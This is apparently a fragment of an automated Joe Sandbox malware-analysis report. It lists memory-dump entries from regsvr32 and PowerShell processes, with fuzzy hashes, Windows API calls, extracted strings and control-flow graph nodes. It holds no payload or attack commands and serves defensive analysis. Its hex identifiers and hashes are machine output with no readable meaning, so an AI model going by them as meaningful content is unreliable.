                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 4912b85591f73c7dd996e81e2642d5334e87bdda541fef23af52f2e0499c735d
                                                                  • Instruction ID: 9885973aa7c7cb62a38610a798ebd8d3f8462f4e9576d494234b396407410f14
                                                                  • Opcode Fuzzy Hash: 4912b85591f73c7dd996e81e2642d5334e87bdda541fef23af52f2e0499c735d
                                                                  • Instruction Fuzzy Hash: FF3169B1901210AFE3209BB48D40FEB77A4BF5171CF054974EA099BB41EF75E80A87E5
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903E8B
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,?,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903ED8
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903EE4
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903F27
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 356e0de8516e246c8f1c5c6fee2e2a42a2e348497b3db3563614e0028ff2957e
                                                                  • Instruction ID: 23fb1b6f33ba0e79a72dffeced1336c8d6eaad06e577304c1dcbc563eda2c427
                                                                  • Opcode Fuzzy Hash: 356e0de8516e246c8f1c5c6fee2e2a42a2e348497b3db3563614e0028ff2957e
                                                                  • Instruction Fuzzy Hash: AF210671B022116BE7115B788C81FAA77BCBF92618F500539EB0897F80DB71D92986E5
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(00000017,?,00000008,00000010,?,00000000,00000000,?,?,?,00000000,?,?,00000004,00000008), ref: 6C90404B
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,?,?,00000008,00000010,?,00000000,00000000,?,?,?,00000000), ref: 6C904098
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000008,00000010,?,00000000,00000000,?,?,?,00000000), ref: 6C9040A4
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,00000008,00000010,?,00000000,00000000,?,?,?,00000000,?,?,00000004,00000008), ref: 6C9040E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 9be1c1c674fafc82c8d7e951f57395343471e55b869fd8cf474d29bcd7352da4
                                                                  • Instruction ID: 56041502fdbba2b62bbaf5872d14516a429e01637db5d57aa2b3de0d6ef28452
                                                                  • Opcode Fuzzy Hash: 9be1c1c674fafc82c8d7e951f57395343471e55b869fd8cf474d29bcd7352da4
                                                                  • Instruction Fuzzy Hash: D2213831B02211DBE7105BA88C80BAA767DAFB260CF50413DDA04A7F81DF71C9188AE6
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(00000018,00000000,00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000004,00000008), ref: 6C903F79
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,00000004,00000008,?,00000000,0000000C), ref: 6C903FD9
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,?,?,00000004,00000008,?,00000000), ref: 6C903FE5
                                                                  • TlsGetValue.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C904016
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: f18bbd5cd6c02126a7e02afd60c3dc750347692457972e8555422578534b479b
                                                                  • Instruction ID: 0e0e423c5b7326bc91da0872f2c3602417ba720c114c8a6e51f81b58eb110f09
                                                                  • Opcode Fuzzy Hash: f18bbd5cd6c02126a7e02afd60c3dc750347692457972e8555422578534b479b
                                                                  • Instruction Fuzzy Hash: 40213A717056116FE7108B798840F96B7BDFFA5B18F11442AEA18C7B40DBB2D82486A1
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,6C8F9785,?), ref: 6C8F8E5E
                                                                  • memmove.MSVCRT(?,?,00000004,?,6C8F9785,?), ref: 6C8F8E78
                                                                  • GetStdHandle.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,00000000,00000001,?,?,6C8DC9EC,00000001,00000000,?), ref: 6C8F8EC3
                                                                  • GetLastError.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,00000000,00000001,?,?,6C8DC9EC,00000001,00000000,?), ref: 6C8F8ED1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandleLastmemcpymemmove
                                                                  • String ID:
                                                                  • API String ID: 2696460671-0
                                                                  • Opcode ID: 61d69faa9b363769abfaaffa7862394fa4bed0858a0c08efa69addb2e9721151
                                                                  • Instruction ID: 710a0a103310246e868556a3ca661ff3cbe89efbccc64efc1b58a4c890124555
                                                                  • Opcode Fuzzy Hash: 61d69faa9b363769abfaaffa7862394fa4bed0858a0c08efa69addb2e9721151
                                                                  • Instruction Fuzzy Hash: EF113D622052542ED320167E9D81AA77B9CDF932A8F144D2BF994CBB41E661DD09C3B1
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,6C954010,00000000,6C866EF6,?,?,6C86B1EF,6C954010,00000000,?,6C86BEF3), ref: 6C86F0E2
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,6C86BEF3,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C86F12C
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,6C86BEF3), ref: 6C86F138
                                                                  • TlsGetValue.KERNEL32(00000000,6C86BEF3,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C86F165
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: b7f9f38a2b199f6c72f59c5391b87fce161770dcfe28beffb96d795f2b14ae99
                                                                  • Instruction ID: 8029ab66315b061b54b58525125a66a83fd3b23352394d4b4af4360463195681
                                                                  • Opcode Fuzzy Hash: b7f9f38a2b199f6c72f59c5391b87fce161770dcfe28beffb96d795f2b14ae99
                                                                  • Instruction Fuzzy Hash: B3112EB16412146FE7324B3ACE40B9A376CFFB2A98F154821EA08DBF40DB71D80486B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                  • API String ID: 0-1608119003
                                                                  • Opcode ID: 60dfae479998fa8761d82812dda1db58aba66e24076e7cbdd43823933afc6a78
                                                                  • Instruction ID: 12224a8cbd925f139f5f3525e265b81ce2381a917b6326bfbcbd3f5429c41f86
                                                                  • Opcode Fuzzy Hash: 60dfae479998fa8761d82812dda1db58aba66e24076e7cbdd43823933afc6a78
                                                                  • Instruction Fuzzy Hash: E08248B1B042099FCB55AB78D82066ABBE6BFC6310F1481BAD506CF351DB35DC86C7A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80bed0b795b60bab0365f16098156b37c46be94f7f49419b7a518cab21989c55
                                                                  • Instruction ID: cceafa99f07ff00b312d55b96a8e53190c68d997b7f66de846d73d977eb51d2c
                                                                  • Opcode Fuzzy Hash: 80bed0b795b60bab0365f16098156b37c46be94f7f49419b7a518cab21989c55
                                                                  • Instruction Fuzzy Hash: 20210371500640DFDF05DF14D9C0B26BFA6FB88318F24C5A9E94A4E756C33AE856CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                  • Instruction ID: 7c9bcf4ae48b03c27acb33a7a0c926798c7d03465fee40e5a42a9924a8c88ab3
                                                                  • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                  • Instruction Fuzzy Hash: 84219D76504640DFCB06CF10D9C4B16BF72FB48318F24C5A9D9494A766C33AD86ACB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8190084715fc956b5528559203e6cebb8a1038a709874ef26d1197a436264e0
                                                                  • Instruction ID: e08bb3061acefe2d57720fea29d630b93f19c4d3215a747d7c5d8cded93b3bfc
                                                                  • Opcode Fuzzy Hash: e8190084715fc956b5528559203e6cebb8a1038a709874ef26d1197a436264e0
                                                                  • Instruction Fuzzy Hash: 1501F232009740AAEB208B29CD84B77BF98EF81324F28C52AEC480B346C379DC45C6B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 900c670f91ab6206ee36dc0f2b9bc22be8de515bd96c983633aa51601311393e
                                                                  • Instruction ID: ffcbecab59a6c3526c21fbaa77817acc8b95eda70a6ad4726d60b346d1705860
                                                                  • Opcode Fuzzy Hash: 900c670f91ab6206ee36dc0f2b9bc22be8de515bd96c983633aa51601311393e
                                                                  • Instruction Fuzzy Hash: 7001526200E7C05ED7128B258894B62BFB4DF43224F1DC1DBD8888F2A3C2695C49C772
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4cd8fcdbdc3db34ab1b402eb3b5fffffca722fe94afbb959a7add1c3ede90251
                                                                  • Instruction ID: d3d81227ff7075626ba7a8fabe341a19e70f6ce02d7b397272e9b7538b0bda33
                                                                  • Opcode Fuzzy Hash: 4cd8fcdbdc3db34ab1b402eb3b5fffffca722fe94afbb959a7add1c3ede90251
                                                                  • Instruction Fuzzy Hash: 09F0F976200604AF9720CF4AD985C23FBADEBD4770719C55AEC4A4B715C672EC42CEA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0dac99d681118b2fe3b1a6733e095b1b4d50920b3f9039c7f1a74b50a3a220f3
                                                                  • Instruction ID: 90f9ff34f09d00565b867922acbd933ba59c4c6e12eddc1924efcdbfc81e9b50
                                                                  • Opcode Fuzzy Hash: 0dac99d681118b2fe3b1a6733e095b1b4d50920b3f9039c7f1a74b50a3a220f3
                                                                  • Instruction Fuzzy Hash: CAF0F976104A80AFD725CF06C985D23BBBAEB85624B198499A84A5B712C671FC42CF60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: fcq$4'^q$4'^q$4'^q$4'^q
                                                                  • API String ID: 0-2717029046
                                                                  • Opcode ID: 7972f0852c7f6beae488126b8c03d801d6e1025a53936cd9481138c69cdbe0bc
                                                                  • Instruction ID: 99424178328fd8d03a1c0b8732453227d84afab677fb92a0e0aa3fa3f0085ea0
                                                                  • Opcode Fuzzy Hash: 7972f0852c7f6beae488126b8c03d801d6e1025a53936cd9481138c69cdbe0bc
                                                                  • Instruction Fuzzy Hash: 87F149B17042059FC765AB78941076BBBA2AFC2310F14897AD546CF392DA36DC8AC7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-2306644927
                                                                  • Opcode ID: 9d123c13dfe671c048e476843816cadc7421c0840f550a9b6837fc30688ef174
                                                                  • Instruction ID: 0c4c5d8f2049858958524cfa71bb45c3b8fd52d1d81ae86a58d3ac024a28ec4c
                                                                  • Opcode Fuzzy Hash: 9d123c13dfe671c048e476843816cadc7421c0840f550a9b6837fc30688ef174
                                                                  • Instruction Fuzzy Hash: A2618EB0A0020EDBDB6DEF18C554BA977F2AB47711F198259E8029B390C735D987CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tP^q$$^q$$^q$$^q
                                                                  • API String ID: 0-3061638629
                                                                  • Opcode ID: f22c2368e26ff55d3af493a732a5034ef8846b3879dc98f409aca6da09cffa34
                                                                  • Instruction ID: 3ad66b37dcf2ff8914f2d61b2e924621ba4f470b9780c845ba315ae08145eba0
                                                                  • Opcode Fuzzy Hash: f22c2368e26ff55d3af493a732a5034ef8846b3879dc98f409aca6da09cffa34
                                                                  • Instruction Fuzzy Hash: 65213DF2A002099FCF649E35C854A65BBE5FF94720F14425AE906DF361CB35DC48C750
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                  • API String ID: 0-2049395529
                                                                  • Opcode ID: 4c48cec535b28668cf074a07690e2211f3112318fe8e7b430e2f4375ecbb8ad9
                                                                  • Instruction ID: 580f55993fe05d25c17bf4ade2144bdce399da0f9ec274da55a7d9acf6f5bc09
                                                                  • Opcode Fuzzy Hash: 4c48cec535b28668cf074a07690e2211f3112318fe8e7b430e2f4375ecbb8ad9
                                                                  • Instruction Fuzzy Hash: E0014971B893869FC37A267818205255F768BC3950B2A09ABC002CF397CC598C4E83A3

                                                                  Execution Graph

                                                                  Execution Coverage:6.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 20848 8094e90 20849 8094ed3 SetThreadToken 20848->20849 20850 8094f01 20849->20850

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 356 273b628-273b641 357 273b643 356->357 358 273b646-273b981 call 273b254 356->358 357->358 419 273b986-273b98d 358->419
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #T8p^$3T8p^$CT8p^$ST8p^$cT8p^$sT8p^
                                                                  • API String ID: 0-2300459978
                                                                  • Opcode ID: ba80584ec1a7d98012bde8b30ba3b49c6c6226037fd1405a0585593c0c64dce1
                                                                  • Instruction ID: a8637992c4ded04d843ef84e095adcdbfe8e578d257ea3bb8af8ba32d5ffec02
                                                                  • Opcode Fuzzy Hash: ba80584ec1a7d98012bde8b30ba3b49c6c6226037fd1405a0585593c0c64dce1
                                                                  • Instruction Fuzzy Hash: 99915F71F006155BDB1AEBB488545AEB7E3EF84704B40892DD10AAF340DF746E0A8BD6

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 173 6f03560-6f03582 174 6f03588-6f0358d 173->174 175 6f0369a-6f036d0 173->175 176 6f035a5-6f035a9 174->176 177 6f0358f-6f03595 174->177 183 6f036e0 175->183 184 6f036d2-6f036de 175->184 181 6f0364c-6f03656 176->181 182 6f035af-6f035b1 176->182 178 6f03597 177->178 179 6f03599-6f035a3 177->179 178->176 179->176 186 6f03663-6f03669 181->186 187 6f03658-6f03660 181->187 182->181 185 6f035b7-6f035d3 182->185 188 6f036e2-6f036e4 183->188 184->188 200 6f035d5 185->200 201 6f035d7-6f035e3 185->201 190 6f0366b-6f0366d 186->190 191 6f0366f-6f0367b 186->191 192 6f03770-6f0377a 188->192 193 6f036ea-6f036f1 188->193 195 6f0367d-6f03697 190->195 191->195 198 6f03786-6f0378c 192->198 199 6f0377c-6f03783 192->199 196 6f037c2-6f037fe 193->196 197 6f036f7-6f036fc 193->197 216 6f03800-6f0380c 196->216 217 6f0380e 196->217 204 6f03714-6f0373f 197->204 205 6f036fe-6f03704 197->205 206 6f03792-6f0379e 198->206 207 6f0378e-6f03790 198->207 208 6f035e5-6f035f0 200->208 201->208 204->196 225 6f03745-6f03753 204->225 210 6f03706 205->210 211 6f03708-6f03712 205->211 212 6f037a0-6f037bf 206->212 207->212 223 6f035f2-6f035f8 208->223 224 6f03608-6f03649 208->224 210->204 211->204 221 6f03810-6f03812 216->221 217->221 226 6f038f0-6f038fa 221->226 227 6f03818-6f0381a 221->227 228 6f035fa 223->228 229 6f035fc-6f035fe 223->229 236 6f0375a-6f0376d 225->236 234 6f03908-6f0390e 226->234 235 6f038fc-6f03905 226->235 231 6f0382a 227->231 232 6f0381c-6f03828 227->232 228->224 229->224 237 6f0382c-6f0382e 231->237 232->237 238 6f03910-6f03912 234->238 239 6f03914-6f03920 234->239 237->226 241 6f03834-6f03836 237->241 242 6f03922-6f0393e 238->242 239->242 243 6f03850-6f03855 241->243 244 6f03838-6f0383e 241->244 249 6f03857-6f0385d 243->249 250 6f0386f-6f03879 243->250 247 6f03840 244->247 248 6f03842-6f0384e 244->248 247->243 248->243 251 6f03861-6f0386d 249->251 252 6f0385f 249->252 253 6f03941-6f03974 250->253 254 6f0387f-6f0389a 250->254 251->250 252->250 260 6f03984 253->260 261 6f03976-6f03982 253->261 262 6f038b4-6f038ed 254->262 263 6f0389c-6f038a2 254->263 266 6f03986-6f03988 260->266 261->266 264 6f038a4 263->264 265 6f038a6-6f038b2 263->265 264->262 265->262 268 6f0398a-6f039a9 266->268 269 6f039fc-6f03a06 266->269 282 6f039b9 268->282 283 6f039ab-6f039b7 268->283 271 6f03a10-6f03a16 269->271 272 6f03a08-6f03a0d 269->272 275 6f03a18-6f03a1a 271->275 276 6f03a1c-6f03a28 271->276 277 6f03a2a-6f03a41 275->277 276->277 284 6f039bb-6f039bd 282->284 283->284 284->269 285 6f039bf-6f039e4 284->285 289 6f039f2-6f039f9 285->289 290 6f039e6-6f039e8 285->290 290->289
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1870743705.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_6f00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-1065491568
                                                                  • Opcode ID: dd1978151046e2dabcf65ced099f6302b762cdb15f1c6e65f3d174574f738b56
                                                                  • Instruction ID: 67d15bf2fc2e5b5cd98a9019527d0ba0fab59899f4c47eae43c211db87b95a53
                                                                  • Opcode Fuzzy Hash: dd1978151046e2dabcf65ced099f6302b762cdb15f1c6e65f3d174574f738b56
                                                                  • Instruction Fuzzy Hash: 97E14833F083169FE7558B699800A6ABBE6AFC5320B1484ABD545CF3D2DE31DC45C7A1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
